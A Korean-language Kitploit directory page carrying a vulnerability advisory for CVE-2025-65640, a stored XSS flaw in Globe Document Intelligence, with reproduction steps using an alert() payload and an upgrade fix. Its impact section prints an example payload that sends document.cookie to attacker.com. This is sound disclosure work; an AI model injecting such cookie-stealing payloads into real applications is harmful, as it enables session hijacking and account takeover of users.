Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-65640 — CVE-2025-65640에 대한 공개 권고: Globe Document Intelligence의 저장형 XSS 취약점 | Kitploit
도구/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
Vulnerability AnalysisWeb Application ExploitationWeb SecurityPenetration TestingPapers & ResearchLearning & Education
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

CVE-2025-65640에 대한 공개 권고: Globe Document Intelligence의 저장형 XSS 취약점

저장소 보기
102개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-65640

1. 취약점 정보

  • CVE ID: CVE-2025-65640 (현재 RESERVED)
  • 취약점 유형: 저장형 크로스 사이트 스크립팅(XSS)
  • CVSSv3 점수: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • 공급업체: Arket/Bluenext S.r.l.
  • 제품: Globe Document Intelligence
  • 영향을 받는 버전: 5.0.0.559
  • 발견자: Vincenzo Emanuele Martone

2. 설명

Globe Document Intelligence 플랫폼(버전 5.0.0.559)에서 저장형 크로스 사이트 스크립팅(XSS) 취약점이 확인되었습니다. 이 애플리케이션은 새로 생성된 문서의 "Title" 속성에 사용자가 입력한 값을 제대로 정화(sanitize)하거나 인코딩하지 않습니다. 인증된 사용자가 요약 페이지(예: "진행 중인 작업 / 최근")로 이동하면 악성 페이로드가 피해자 브라우저의 컨텍스트에서 반사되어 실행됩니다.

3. 영향

이 취약점을 통해 인증된 공격자는 악성 JavaScript 코드를 서버에 저장할 수 있습니다. 다른 인증된 사용자(관리자 계정 포함)가 영향을 받는 페이지를 열람하면 스크립트가 자동으로 실행됩니다. 아래 개념 증명(PoC)은 무해한 alert()를 사용하여 취약점을 입증하지만, 공격자는 이 결함을 무기화하여 세션 하이재킹(Session Hijacking) 및 계정 탈취(Account Takeover)를 달성할 수 있습니다. 예를 들어 <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>와 같은 페이로드를 주입하면 피해자의 세션 쿠키를 공격자가 통제하는 외부 서버로 은밀히 유출할 수 있습니다.

4. 재현 단계(개념 증명)

취약점을 재현하려면 인증된 공격자가 다음 단계를 수행할 수 있습니다:

  1. 문서 생성 섹션("새 문서(Nuovo documento)")으로 이동하고 필수 필드를 임의의 데이터로 채워 새 문서를 성공적으로 생성합니다.
  2. 양식을 제출하고 문서를 생성합니다.
  3. 새로 생성된 문서를 선택하고 컨텍스트 메뉴(마우스 오른쪽 버튼 클릭 -> 문서 속성)를 연 다음 "Title" 필드를 찾습니다.
  4. "Title" 필드에 다음 기본 XSS 페이로드를 주입합니다: <script>alert("XSS")</script>
  5. 변경 사항을 저장합니다. 악성 페이로드는 이제 데이터베이스에 영구적으로 저장됩니다.
  6. "진행 중인 작업 / 최근(Task in attesa/Recenti)" 페이지로 이동합니다.
  7. 페이지가 문서 제목을 출력 인코딩 없이 렌더링하므로 JavaScript 페이로드가 실행되어 alert가 트리거됩니다.

5. 권장 완화 조치

공급업체에 따르면 이 취약점은 버전 5.1.0.575에서 해결되었습니다. 이 문제를 해결하려면 Globe Document Intelligence 플랫폼을 버전 5.1.0.575로 업데이트하는 것이 좋습니다.


면책 조항

이 개념 증명(PoC)은 교육 및 연구 목적으로만 제공됩니다. 이 문서에 기술된 정보와 코드는 악의적인 활동이나 시스템 소유자의 명시적인 사전 승인 없이 어떠한 시스템에 대해서도 사용되어서는 안 됩니다. 저자는 어떠한 책임도 지지 않으며, 제공된 자료의 적용으로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다.

도구 다운로드